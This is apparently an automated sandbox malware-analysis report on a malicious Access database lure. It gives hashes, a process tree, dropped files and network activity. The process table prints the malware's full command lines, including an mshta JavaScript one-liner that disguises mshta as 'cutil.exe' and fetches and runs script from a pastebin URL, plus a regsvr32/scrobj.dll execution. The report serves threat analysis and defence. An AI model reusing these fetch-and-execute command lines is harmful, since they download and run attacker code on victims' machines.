File name: | Leaked_Records_15072019_Col.malware |
Full analysis: | https://app.any.run/tasks/62b0a7f2-e9f6-4199-bb6d-3bf5470a7210 |
Verdict: | Malicious activity |
Analysis date: | July 17, 2019, 14:52:02 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/x-msaccess |
File info: | Microsoft Access Database |
MD5: | BEFC603B7E59E0B739AE150FFC0CAD3A |
SHA1: | 4BF499C320E6806E877E68876A3BEB2ADA2A45AC |
SHA256: | 7C02D2F27147C49030C0619D1D313CFA24234F789E149B2E3D1478400496A32C |
SSDEEP: | 1536:DAQxNqc6lh3WHzVdGduAixBQdpdzdmdudJ:DAQxNqc6lsfkuAixAjJEcJ |
.accdb | | | Microsoft Access 2007 Database (90.4) |
---|---|---|
.pi2 | | | DEGAS med-res bitmap (9.5) |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3540 | "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Local\Temp\Leaked_Records_15072019_Col.malware.accdb | C:\Windows\system32\rundll32.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3736 | "C:\Program Files\Microsoft Office\Office14\MSACCESS.EXE" /NOSTARTUP "C:\Users\admin\AppData\Local\Temp\Leaked_Records_15072019_Col.malware.accdb" | C:\Program Files\Microsoft Office\Office14\MSACCESS.EXE | rundll32.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Access Version: 14.0.6024.1000 | ||||
3408 | "C:\Windows\System32\mshta.exe" javascript:eval(new%20ActiveXObject("Scripting.FileSystemObject").CopyFile%20("c:\\windows\\system32\\mshta.exe",%20new%20ActiveXObject("Wscript.Shell").ExpandEnvironmentStrings("%25userprofile%25")+"\\AppData\\Local\\Microsoft\\cutil.exe"));eval(new%20ActiveXObject("Wscript.Shell").Run(new%20ActiveXObject("Wscript.Shell").ExpandEnvironmentStrings("%25userprofile%25")+"\\AppData\\Local\\Microsoft\\cutil%20javascript:eval(a=GetObject('script:https://pastebin.com/raw/viwSRB6M'));close();"));close(); | C:\Windows\System32\mshta.exe | MSACCESS.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
2224 | "C:\Users\admin\AppData\Local\Microsoft\cutil.exe" javascript:eval(a=GetObject('script:https://pastebin.com/raw/viwSRB6M'));close(); | C:\Users\admin\AppData\Local\Microsoft\cutil.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3080 | "C:\Windows\System32\regsvr32.exe" /u /n /s /i:C:\Users\admin\AppData\Local\logs.tmp scrobj.dll | C:\Windows\System32\regsvr32.exe | — | cutil.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft(C) Register Server Exit code: 5 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3736 | MSACCESS.EXE | C:\Users\admin\AppData\Local\Temp\CVRF7DD.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3736 | MSACCESS.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Access\System.mdw | mdw | |
MD5:FD1944E71E7C179D8CE8A92E40E68796 | SHA256:960E3318E2CE56D9AA6A6A9AC41250A4B67A0A6DE361D7569FF2F2A00FC5CEFE | |||
3408 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\cutil.exe | executable | |
MD5:E2FE656A79D8F4C4FD70201E7423BDA0 | SHA256:DB40B518DEB81B146CC81B0C360AECC84204E3CDC108B1F5F158EE60C1792806 | |||
2224 | cutil.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\viwSRB6M[1].txt | xml | |
MD5:3739532BDF9B523E245EEEDD062AB5FF | SHA256:544C113236191E588D7679CB9168C5D45A8D4736B5D08217BE1C66DED4F468F3 | |||
2224 | cutil.exe | C:\Users\admin\AppData\Local\temp.tmp | executable | |
MD5:91456160503D1965136BBE939606878E | SHA256:350CDEC0802FB24B9AA93CF44C318DCC12BBAF2D85B0E43D0142C54690A18138 | |||
2224 | cutil.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@pastebin[1].txt | text | |
MD5:936B62A5A161618FA0DE04F10E56E152 | SHA256:F307C109EB0D41B2209C3C982B38279F2E772660D9F6F207D46C623CF0BA9693 | |||
2224 | cutil.exe | C:\Users\admin\AppData\Local\logs.tmp | text | |
MD5:626C22DE97EEC542521DC24103DAA418 | SHA256:85287E7301D3983BBE6A95B4FA6F6451DB816E33F9366E27E561711B505F14C7 | |||
3736 | MSACCESS.EXE | C:\Users\admin\AppData\Local\Temp\Database.lnk | lnk | |
MD5:31AEFA424BD036B40F8B9B64C1C9F78F | SHA256:67106A3278F63805F941D515BE4A40EA1DB3F0D926A4C9A8C71376F10E5EED26 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2224 | cutil.exe | 104.20.208.21:443 | pastebin.com | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
pastebin.com |
| shared |
Process | Message |
---|---|
MSACCESS.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Access\System.mdw |